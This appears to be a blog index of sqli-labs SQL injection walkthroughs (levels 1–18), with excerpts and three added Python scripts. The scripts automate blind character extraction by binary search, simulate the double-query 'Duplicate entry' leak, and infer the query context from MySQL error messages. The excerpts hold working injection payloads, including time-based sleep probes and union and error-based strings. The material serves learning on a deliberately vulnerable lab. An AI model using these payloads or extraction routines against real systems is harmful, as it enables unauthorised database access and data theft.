sqli-labs
S1xTwe1ve
This author is lazy and has left nothing here…
sqli-labs Less-18
LESS-18 POST - Header Injection - Uagent field - Error based. 0x01. Try a few random inputs to see whether anything is reflected. Both the error response and the correct response show the IP address. Error response: ... Correct response: ... In the correct response the User-Agent is displayed, so we guess it can be used for injection; the source code can be examined to confirm. The username and password are taken from POST and run through check_input, so in those two ...
Original · 2020-05-04 21:42:02 · 776 views · 0 comments
sqli-labs Less-17
Less-17 POST - Update Query - Error Based - String. 0x01. Look at the code. As usual, try a few inputs first: uname=1'&passwd=1, uname=1"&passwd=1, uname=1&passwd=1', uname=1&passwd=1" all return the error page. Going by the hint for this level, the MySQL statement should involve an UPDATE; take a look at ...
Original · 2020-04-09 19:22:14 · 163 views · 0 comments
sqli-labs Less-16
Less-16 POST - Blind - Boolian/Time Based - Double quotes. Less-16 and Less-15 are both blind injection; when building the payload you only need to replace ' with "). 0x01. Query statements: uname=1&passwd=1 or 1=1#, uname=1&passwd=1' or 1=1#, uname=1&passwd=1" or ...
Original · 2020-04-01 14:39:17 · 218 views · 0 comments
sqli-labs Less-15
Less-15 POST - Blind - Boolian/time Based - Single quotes. 0x01. Press F12 to inspect the page and get the names of the submitted form fields, uname and passwd. uname corresponds to the username field of the login box and passwd to the password field. Any uname and passwd you enter only returns the error page, with no error message at all. Construct an always-true condition so that the "username and password incorrect" response is ...
Original · 2020-03-29 13:48:38 · 163 views · 0 comments
sqli-labs Less-14
Less-14 POST - Double Injection - Single quotes - String - with twist. Differs from Less-13 only in how the value is closed; both are solved with double-query injection and the basic steps are the same. 0x01. uname=1&passwd=1&submit=Submit, uname=1"&passwd=1&submit=Submit: You have ...
Original · 2020-03-28 12:05:38 · 319 views · 0 comments
sqli-labs Less-13
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1. uname= ') union select count(*),c...
Original · 2020-03-27 14:21:34 · 130 views · 0 comments
sqli-labs Less-12
Less-12 POST - Error Based - Double quotes - String - with twist. The difference between Less-11 and Less-12 is that one closes with a single quote and the other with a double quote plus parentheses; for Less-12 Burp Suite is used directly for the exercise, and the steps are basically the same as Less-11. 0x01. On the original page the username and password parameters are uname and passwd. Submit the parameters in Burp: uname=xxx&...
Original · 2020-03-26 13:58:17 · 236 views · 0 comments
sqli-labs Less-11
Less-11 POST - Error Based - Single quotes - String. 0x01. Inspecting the elements of the original page shows that the username and password parameters are uname and passwd. A correct username and password gives the success response; a wrong username and password gives the failure response. 0x02. Determine the injection type: uname=1 passwd=1, uname=1" passwd=1, uname=1' passwd=1: Yo...
Original · 2020-03-26 13:08:34 · 437 views · 0 comments
sqli-labs Less-10
Less-10 Get - Blind - Time based - double quotes. Time-based blind injection (the difference between Less-9 and Less-10 is a single quote versus a double quote; the other steps are the same). A true condition returns immediately; a false one waits 5 seconds. 1. Guess the database name: ?id=1" and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ , ?id=1" a...
Original · 2020-03-25 12:19:49 · 189 views · 0 comments
sqli-labs Less-9
Less-9 Get - Blind - Time based - Single Quotes. Original page. Time-based blind injection: if the condition is true the page returns immediately, if it is false the server waits 5 seconds. 1. Guess the database name: ?id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ , ?id=1' and If(ascii(substr(database(),1,1))=1...
Original · 2020-03-24 13:19:01 · 147 views · 0 comments
sqli-labs Less-8
Less-8 Get - Blind - Boolian Based - Single Quotes. 1. Original page. 2. ?id=1 3. ?id=1' 4. Try boolean-based blind injection. The code has a SQL injection vulnerability, but the page neither displays data nor an error message, so we construct statements that test a guess about the database and use the page's "true" and "false" responses to tell whether the guess was right: ?id=1' and (length(database()))>...
Original · 2020-03-13 00:15:59 · 1361 views · 0 comments
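The Less-8, Less-9/10 and Less-15/16 writeups all probe one character at a time with equality tests (ascii(...)=115 and so on). The script below is an added example, not code from the original posts: it automates the same two oracles (Less-8's "page body or no page body" and Less-9/10's "immediate or sleep(5)") and switches to a binary search on ascii(...)>N, which needs seven requests per character instead of up to 127. The target is replaced by a simulated server and a constructed database name, so it runs offline; against a live lab instance the two oracle functions would send the payload from build_payload with an HTTP client and inspect the body or the elapsed time. The 0.05 second sleep stands in for the real sleep(5).

```python
import time

# Constructed stand-in for the lab's database; a real run only learns this
# through the oracle, never by reading the constant.
DB_NAME = "security"
SLEEP = 0.05  # stand-in for sleep(5) in the real payload


def build_payload(pos, value, op="=", quote="'"):
    """The GET payload used in the Less-9/10 writeups, e.g.
    1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
    quote is ' for Less-9/15 and " for Less-10/16."""
    return (f"1{quote} and if(ascii(substr(database(),{pos},1)){op}{value},"
            f"1,sleep(5))--+")


def _compare(actual, op, value):
    return {">": actual > value, "<": actual < value, "=": actual == value}[op]


def simulated_char(pos, value, op):
    """What the lab evaluates for ascii(substr(database(),pos,1)) op value.
    Past the end of the string substr() is '' and ascii('') is 0, as in MySQL."""
    ch = ord(DB_NAME[pos - 1]) if pos <= len(DB_NAME) else 0
    return _compare(ch, op, value)


def simulated_length(value, op):
    """What the lab evaluates for length(database()) op value (Less-8 probe)."""
    return _compare(len(DB_NAME), op, value)


def boolean_oracle(pos, value, op):
    """Less-8 style: the body is present when the condition holds, empty otherwise."""
    body = "You are in..........." if simulated_char(pos, value, op) else ""
    return body != ""


def time_oracle(pos, value, op):
    """Less-9/10 style: answer at once when true, sleep when false; classify by
    elapsed time with a threshold at half the sleep."""
    start = time.monotonic()
    if not simulated_char(pos, value, op):
        time.sleep(SLEEP)
    return time.monotonic() - start < SLEEP / 2


def counting(oracle):
    """Wrap an oracle and record how many requests it would have sent."""
    calls = [0]

    def wrapped(*args):
        calls[0] += 1
        return oracle(*args)

    wrapped.calls = calls
    return wrapped


def find_length(length_oracle, max_len=64):
    """Binary-search length(database()) using only '>' probes."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if length_oracle(mid, ">"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(char_oracle, length):
    """Recover each character with seven ascii(...)>N probes (range 0..127)."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if char_oracle(pos, mid, ">"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    n = find_length(simulated_length)
    print(n, extract(boolean_oracle, n), extract(time_oracle, n))
```

Equality probing, as in the posts, is fine by hand but costs up to 127 requests per character; the '>' binary search above always costs exactly seven for the 0..127 range, which matters when each false answer costs a 5 second sleep.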
sqli-labs Less-7
Less-7 GET - Dump into outfile - String. Original page. Work out which type of injection it is: ?id=1, ?id=1', ?id=1", ?id=1' or 1=1--+ (comment out the rest of the query) still reports an error, which means there are parentheses. ?id=1') or 1=1--+ , ?id=1')) or 1=1--+ . Inferred query: Select * from users where id=(('$id')). Query...
Original · 2020-03-09 00:57:56 · 143 views · 0 comments
sqli-labs Less-6
Less-6 GET - Double Injection - Double quotes - String. 1. Original page 2. ?id=1 3. ?id=1" : '"1"" LIMIT 0,1' --> (strip the outer quotes) "1"" LIMIT 0,1 --> SQL: Select login_name,password from admin ...
Original · 2020-03-06 19:48:31 · 146 views · 0 comments
sqli-labs Less-4
Less-4 GET - Error based - Double Quotes - String. 1. Original page 2. ?id=1 3. ?id=1" 4. '"1"") LIMIT 0,1' --> (strip the outer quotes) "1"") LIMIT 0,1 . SQL: Select login_name,password from admin where id=("id") limit 0,1 5. i...
Original · 2020-03-06 17:24:04 · 100 views · 0 comments
sqli-labs Less-5
Less-5 GET - Double Injection - Single quotes - String. 1. Original page 2. ?id=1 : a correct input does not show anything from the database, it just returns "You are in...", so we have to make it report an error that carries the information we want. 3. ?id=1' : ''1''LIMIT 0,1' --> (strip the single quotes) '1''LIMIT 0,1 --> because what we entered was id=1', that is ...
Original · 2020-03-06 17:45:14 · 149 views · 0 comments
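Less-5/6 and Less-13/14 rely on "double-query" (double injection): the page never prints query results, so the data is smuggled out inside a "Duplicate entry" error produced by count(*) ... group by concat((select ...),floor(rand(0)*2)). The posts use the trick without saying why it errors. The simulation below is an added example, not code from the writeups or from MySQL: it models GROUP BY as MySQL implements it (the group expression is evaluated once to look the key up in the temporary table and, when the key is absent, evaluated again to build the row that is inserted), with a constructed 0/1 sequence standing in for the deterministic floor(rand(0)*2) and "security" standing in for the leaked value.

```python
import re


class DuplicateEntry(Exception):
    """Stand-in for MySQL error 1062; its message is what leaks the data."""


# Constructed stand-in for floor(rand(0)*2). rand(0) is seeded, so MySQL returns
# the same sequence every time; this list mirrors the prefix commonly quoted for
# it (0,1,1,0,1,1,1,0,0,1,1) but should be treated as sample data.
RAND_BITS = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1]


def make_key_fn(secret, bits):
    """Behaves like concat((select database()),floor(rand(0)*2)): every call
    consumes the next rand() value, exactly like the expression in the query."""
    it = iter(bits)
    return lambda: f"{secret}{next(it)}"


def group_by_count(row_count, key_fn):
    """GROUP BY over row_count rows (information_schema.tables in the payload).
    The key is evaluated once for the look-up and again for the insert; when
    rand() changes between the two, the insert can collide with a group that
    already exists, and MySQL raises 'Duplicate entry'."""
    table = {}
    for _ in range(row_count):
        key = key_fn()                      # first evaluation: look-up
        if key in table:
            table[key] += 1                 # count(*) for an existing group
            continue
        key = key_fn()                      # second evaluation: inserted value
        if key in table:
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        table[key] = 1
    return table


def run_double_query(secret, row_count, bits=RAND_BITS):
    """Simulate: select count(*),concat((select database()),floor(rand(0)*2))x
    from information_schema.tables group by x
    Returns ('error', message) or ('ok', {group: count})."""
    try:
        groups = group_by_count(row_count, make_key_fn(secret, bits))
    except DuplicateEntry as e:
        return "error", str(e)
    return "ok", groups


def min_rows_to_error(secret, bits=RAND_BITS):
    """Smallest number of rows in the FROM table for which the query errors."""
    for n in range(1, len(bits) // 2 + 1):  # each row consumes at most 2 bits
        if run_double_query(secret, n, bits)[0] == "error":
            return n
    return None


LEAK_RE = re.compile(r"Duplicate entry '(.*)[01]' for key")


def leak_from_error(message):
    """Drop the trailing rand() bit from the duplicated key to get the data back."""
    m = LEAK_RE.search(message)
    return m.group(1) if m else None


if __name__ == "__main__":
    status, result = run_double_query("security", 3)
    print(status, result, leak_from_error(result) if status == "error" else None)
```

On this sequence the first row looks up "security0", misses, and inserts "security1"; the second row hits "security1"; the third looks up "security0", misses, re-evaluates to "security1" and collides. That is why the payload selects from a table with at least three rows (information_schema.tables) rather than from the single-row result of the login query.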
sqli-labs Less-3
Less-3 GET - Error based - Single quotes with twist - String. 1. Original page 2. ?id=1 3. ?id=1' : ''1'') LIMIT 0,1' --> '1'') LIMIT 0,1 --> '1') LIMIT 0,1 --> ('1') LIMIT 0,1 . SQL: Select login_na...
Original · 2020-03-05 17:35:46 · 210 views · 0 comments
sqli-labs Less-1
Less-1 GET - Error based - Single quotes - String. 1. Original page 2. ?id=1 3. ?id=1' : ''1''LIMIT 0,1' --> (strip the single quotes) '1''LIMIT 0,1 --> because what we entered was id=1', that is input=1', we can deduce 'input' LIMIT 0,1 . SQL: Select login_name...
Original · 2020-02-28 18:12:58 · 166 views · 0 comments
sqli-labs Less-2
Less-2 GET - Error based - Intiger based. 1. Original page 2. ?id=1 3. ?id=1' : ''LIMIT 0,1' --> ' 'LIMIT 0,1 ' --> 'LIMIT 0,1 --> because what we entered was id=1', that is input=1', we can deduce input LIMIT 0,1 . SQL: Select login_n...
Original · 2020-03-04 16:48:56 · 102 views · 0 comments
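The Less-1 to Less-4 writeups all apply the same deduction: take the text MySQL quotes after "near", strip the outer quotes, find the injected 1' or 1" inside it, and read off the characters the template puts around the value. The script below is an added example that is not part of the original posts; it encodes that deduction as a function and runs it over constructed error fragments in the shape the posts show (Less-2's fragment begins at the injected quote, because the 1 before it was accepted as a number). It also generalises to the double parentheses of Less-7, which the post infers without an error message. The SELECT it reconstructs uses the users table of the lab, not the admin table guessed in the posts.

```python
import re

# Constructed error messages, trimmed to the part after "near"; real ones start
# with "You have an error in your SQL syntax; check the manual ...".
SAMPLES = {
    "Less-1": ("1'", "... near ''1'' LIMIT 0,1' at line 1"),
    "Less-2": ("1'", "... near '' LIMIT 0,1' at line 1"),
    "Less-3": ("1'", "... near ''1'') LIMIT 0,1' at line 1"),
    "Less-4": ('1"', "... near '\"1\"\") LIMIT 0,1' at line 1"),
}

NEAR_RE = re.compile(r"near '(.*)' at line \d+", re.S)


def error_fragment(message):
    """The text MySQL quotes after 'near': the query from the point where the
    parser gave up to its end. None when the page returned no verbose error."""
    m = NEAR_RE.search(message)
    return m.group(1) if m else None


def infer_context(probe, message):
    """Return (quote, parens): quote is "'" or '"' for a string context, "" for a
    numeric one; parens is how many ) close the value. None if undecidable."""
    frag = error_fragment(message)
    if frag is None:
        return None
    quote = probe[-1]                       # the quote we injected
    idx = frag.find(probe)
    if idx >= 0 and frag[:idx].endswith(quote):
        # String context: the template's opening quote precedes our value and
        # its own closing quote follows the quote we injected.
        rest = frag[idx + len(probe):]
        if not rest.startswith(quote):
            return None
        rest = rest[1:]
        return quote, len(rest) - len(rest.lstrip(")"))
    if frag.startswith(quote):
        # Numeric context: the parser choked on the injected quote itself, so
        # the fragment starts there and the 1 before it was consumed as a number.
        rest = frag[1:]
        return "", len(rest) - len(rest.lstrip(")"))
    return None


def reconstruct_query(ctx):
    """The lab query the context implies, written the way the posts write it."""
    quote, parens = ctx
    return ("SELECT * FROM users WHERE id=" + "(" * parens
            + f"{quote}$id{quote}" + ")" * parens + " LIMIT 0,1")


def closing_sequence(ctx):
    """What to append to the value so the rest of a payload is parsed as SQL,
    e.g. ') for Less-3; the template's tail is then commented out with --+ ."""
    quote, parens = ctx
    return quote + ")" * parens


def fingerprint_all(samples=SAMPLES):
    """Map every sample to the reconstructed query (None if no error came back)."""
    out = {}
    for name, (probe, msg) in samples.items():
        ctx = infer_context(probe, msg)
        out[name] = reconstruct_query(ctx) if ctx else None
    return out


if __name__ == "__main__":
    for name, query in fingerprint_all().items():
        print(name, query)
```

When infer_context returns None the page gave no usable error, which is the situation of Less-7 onward; the next step is then the boolean or time-based probing used in the later levels.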